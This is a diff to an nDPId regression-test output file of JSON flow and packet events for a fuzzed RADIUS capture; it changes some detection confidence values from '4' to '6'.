+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997046798,"flow_last_seen":1528997046798,"flow_idle_time":200000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"thread_ts_msec":1528997046798,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.77.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997050187,"flow_last_seen":1528997050187,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997050187,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01390{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1528997050187,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528997050187,"pkt":"AAAMB6xAABRP+4rqCABFAALbtOlAAP8RAAAKDEAexuIZPnIQBxQCxwAAATICv5GU17VEoPcQLX8EgXuXJCsaCgAAV8gOBFVTGgwAAFfIDQZ3aWYlAA8AAFfICQlXSVNQUjEwGgkAQzghDQM1NwZbIqS6ATUwMzExNDgwMjgxNTAxNTg5QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZTAtNWYtNDUtOTAtMDktNWYeJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6byUAaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYmE4ZmE0MjI1YiwgNWIyMmE0OWYvZTA6NWYaNDU6OTA6MDk6NWYvMjE2BAasFAEQIA5WWldDMlRlc3RMxWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TzoCAQA4ATAzMTE0ODAyODE1MDE1ODlAd2xBbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZxoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFdhoQAABXyAIKU3RhbmRhcmQaEAAAV4wLClRlYnQgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBElAHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWlcgQzIgVGVzdCBMYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOCERBgAAAAAaFQAAOCESD0ludmFsaWQgVmFsdWUaHQAAOGkTFzQwLjgwNDg4Mk4tNzQuMTAyAjM5VxoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAhoVAAA4YRYPU3RhZGltbURpqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997050187,"flow_last_seen":1528997050187,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997050187,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997050187,"flow_last_seen":1528997050187,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997050187,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00637{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1528997050255,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1528997050255,"pkt":"ABRP+0\/qcNuYVcUnCABFAACl\/HNAAPwRV4nG4hk+CgxAHgcUchAIkVSXCzIAiQCjJQAe3VyUfsXAQgu9DVIBNTAzMTE0ODAyODE1MDE1ODlAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE0OWYvZTA6NWY6NDU6OTA6MDk6NWYvMjE2Tw4BAAAMFwwAAAwBf\/xQEnsk2TyvRrElAGPaQu1TGoc="} 01327{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1528997050383,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":697,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":697,"pkt_l4_len":663,"thread_ts_msec":1528997050383,"pkt":"AAAMD6xAABRP+4rqCABFAAKrtOpAAP8RAAAKDEAexuIZPnIQBxQClwAAATMCj3XAts8pgtMIwokQgS0z6XQaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AJQBbCQlXSVNQUjEwGgkAADghDQM1NwZbIqS6ATUwMzExNDgwMjgxNTAxNTg5QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjR4MGAAAAAR8TZTAtNWYtNDUtOTAtMDktNWYeJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJAStPdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYmE5ZmE0MjI1YiwgNWIyMmE0OWYvZTA6NWY6NDU6OTA6MDk6NWYvMjFiBAasFAEQSg5WWldDMlBlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAElBBgAAAAZRBDU2TwoCAAAIFwwAABoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIGRFWWlcgQzIgVGVzdCBMYWIaCyAAV8glBVZ6VxoNAAA4IQ4HMDcwNzEaDKYAOCERBgAAAAAaFQAAOCESD0ludmFsaWQgVmFsdWUaHQAAOCETFzQwLjgwNDg4Mk4tNzQuMzAyODM5VxoMAAA4IRQGAAABAhpYAAA4IRUGAAAAAhoVAAA4IRYPU3RhZGl1bURpcmVjdBoMAAAFgwcGwFBKmVASp1PPp6fzyd7h983G\/yoSHA=="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":82,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":172,"global_ts_msec":1528997050448} @@ -112,45 +112,45 @@ 00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1528997134036,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528997134036,"pkt":"ABxP+4rqcNuYVcUnCABFAADh\/WZAAPsRV2PG4hk1Cgx4HgcUchAAzWYuCzpCxXGn0Uh9HQ+OyLOqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":99,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997212627,"flow_last_seen":1528997212627,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997212627,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"206.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01390{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1528997212627,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528997212627,"pkt":"AAAMB6xAABRP+4p2CABFAALbIPZAAP8RAAAKDEAezuIZNXIQBxQCxwAAATwCvzm9iAIIk1e98ZWWJBeuNcEaCgAAV8gOBCUAGgwAAFfIDQZ3aWZpJQAAAFfICQlXSVNQUjEwGgkAADghDQMxNwZbIqVcATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQUNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYmM0OWE1MjI1YiwgNWIyMmE1NDlOZjA6Nzk6NjA6ZDE6N2Q6MzcvMjE5BgasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAQwIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TzoCHAA4ATAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZxoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGglqAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWlcgQzIgVGVzdCBMYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOCERBgAAAAAaFQAAOCESD0ludmFsaWQgVmFsdWUaHQAAOCETFzQwLjgwNDg4Mk4tNzQuMTAyODM5VxoMAACqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997212627,"flow_last_seen":1528997212627,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997212627,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"206.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997212627,"flow_last_seen":1528997212627,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997212627,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"206.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00199{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":105,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":3072,"global_ts_msec":1528997217637} 01254{"packet_event_id":1,"packet_event_name":"packet","packet_id":105,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":725,"pkt_type":3072,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":725,"pkt_l4_len":0,"thread_ts_msec":1528997217103,"pkt":"AAAMB6xAABRP+4rqDABFAALHIPlAAP8RAAAKDEAexuIZNXIQBxQCswAAAT8Cqw8xhdF672TCSWbkw5Hj930aCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMxNwZbIqVhATUwMzFJNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3Bwbld0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LeoyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmZxMGFjMDAwMDAwYmM0OWE1MjI1YiwgNWIyMmE1NDkvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjE5BAasFAEQIA5WWldDMlRlc3RMYWIaWAAAN2MBBgAAAAIGBgAAAAIMBgAABUM9BgAAABNABgAAAA1BBgAAAAZRBDU2TyYCAnIkFwEAAAsFAADyEldFerwQeByQ1kXOElNqAwIAILdGopoaFAAAV8gHDlZaV0MyVGVzdExhYhoKAABXyGQERVQaEAAAV8gKClN0YW5kYXJkGhBmAFfICwpUZXN0IExhYhoJAABXyA8DMRoKAABXyBAETkoacAAAV8gRC0x5dGRodXJzdBoMAABXyBIGAAAAyRoXAABXyB0RVlpXIEMlAFRlc3QgTGFiGgsAAFfIJQVWelcaDQAAOCEOBzA3MDcxGgwAADghEQYAAAAAGhUAADghEg9JbnZhbGlkIFZhbHVlGh0AADghExc0MC44MDQ4ODJOLTc0LjEwMjgzOTQaDAAAOCEUBgAAAQIaDAAAOCEVBgAAAAIaFQAAOCEWD1N0YWRpdW1EaXJlY3QaDAAABYMHBsBQSplQEkID4rD4BVEKK4FucluzaU0="} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":108,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997221594,"flow_last_seen":1528997221594,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997221594,"l3_proto":"ip4","src_ip":"198.157.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00717{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1528997221594,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528997221594,"pkt":"ABRP+4olANuYVcUnCABFAADh\/iUAAPwRVXHGnRk1CgxAHgcUchAAzbneC0AAxXHEG2jtNCK6Pim9jxODZEQBNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWYyMmE1NDkvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjE5T0oBAgBIFwEAAAEFAAC130tW1AOjyO4EWETLCns4AgUAADpBoI2KsgAA1NEalEdfz2mLAQACCwUAAKYxpY6FFiCOWOh\/rUxMKdLfEvgA+nuQ51DKsqmwU74i6PE="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":108,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997221594,"flow_last_seen":1528997221594,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997221594,"l3_proto":"ip4","src_ip":"198.157.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":108,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997221594,"flow_last_seen":1528997221594,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997221594,"l3_proto":"ip4","src_ip":"198.157.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":109,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":691,"global_ts_msec":1528997221878} 01254{"packet_event_id":1,"packet_event_name":"packet","packet_id":109,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":725,"pkt_l4_len":0,"thread_ts_msec":1528997221594,"pkt":"AAAMB6xAABRP+4rqCABFAALHIPtuAP8RAAAKDEAexuIZNXIQB1QCswAAAUECqxyBDV4hA0zB94U9KheYsYAaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8Az1fICQlXSVNQUqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00615{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":111,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997023501,"flow_last_seen":1528997023501,"flow_idle_time":200000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528997222052,"l3_proto":"ip4","src_ip":"198.162.25.53","dst_ip":"10.12.64.30","src_port":1810,"dst_port":29200,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00600{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997023501,"flow_last_seen":1528997023501,"flow_idle_time":200000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528997222052,"l3_proto":"ip4","src_ip":"198.162.25.53","dst_ip":"10.12.64.30","src_port":1810,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528996990648,"flow_last_seen":1528996990648,"flow_idle_time":200000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1528997222052,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":29264,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528996990648,"flow_last_seen":1528996990648,"flow_idle_time":200000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1528997222052,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":29264,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00622{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":111,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996990566,"flow_last_seen":1528996990566,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997222052,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00607{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996990566,"flow_last_seen":1528996990566,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997222052,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00703{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":111,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":63,"flow_first_seen":1528996068129,"flow_last_seen":1528997222052,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":28074,"flow_avg_l4_payload_len":445,"midstream":0,"thread_ts_msec":1528997222052,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00703{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":111,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":63,"flow_first_seen":1528996068129,"flow_last_seen":1528997222052,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":28074,"flow_avg_l4_payload_len":445,"midstream":0,"thread_ts_msec":1528997222052,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":112,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997257373,"flow_last_seen":1528997257373,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997257373,"l3_proto":"ip4","src_ip":"198.230.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00718{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1528997257373,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528997257373,"pkt":"ABRP+4rqcNuYVcUnCABFAADh\/rJAAPwRVQ7G5hk+CgxAHgcUchAAzVNaC0IAxU8cxybfn6wHKrLckjIf7\/YBNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE1ODkvZjA6Nzk6NjA6ZDE6JQA6MzcvMjIwT0oBAgBIFwEAAAEFAAAT7kZq++1qq413Vnves+S4AgUAAGvzvZs2igAAfRnGIlbt+UCLAQACCwUAACpMCwseOO2rxFCxvsNqPXlQEr\/1MOfsnBTEG6mXYQrsxeM="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":112,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997257373,"flow_last_seen":1528997257373,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997257373,"l3_proto":"ip4","src_ip":"198.230.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 